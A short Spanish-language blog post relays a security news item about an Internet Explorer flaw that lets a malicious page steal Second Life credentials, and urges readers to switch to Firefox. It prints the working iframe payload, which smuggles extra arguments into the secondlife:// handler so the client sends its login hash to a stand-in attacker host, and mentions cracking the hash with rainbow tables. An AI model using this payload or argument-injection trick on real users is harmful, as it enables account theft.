TheDaVis Blog

Me acabo de entrar en kriptopolis.org de un nuevo exploit usando el Explorer permitiendo obtener la contraseña de Second Life de la víctima al visitar con Explorer una página maliciosa con el contenido siguiente:

<iframe src='secondlife://" -autologin -loginuri  "http://web.atacante.com/sl/record-login.php'>
 
</iframe>

Así se provoca que arranque el cliente de Second Life e intente conectarse usando el usuario / contraseña que esta a la vez puede ser recogida por la web maliciosa en su hash MD5 que puede ser usada directamente para entrar con la cuenta de la víctima o simplemente pasar ese hash por unas rainbow tables para tener la contraseña desencriptada.

Así que si entras en Second Life y además navegas con Explorer… ya sabes: ¡pásate de una vez a FIREFOX!

Fuente: kriptopolis.org

thedavis Internet Imprimir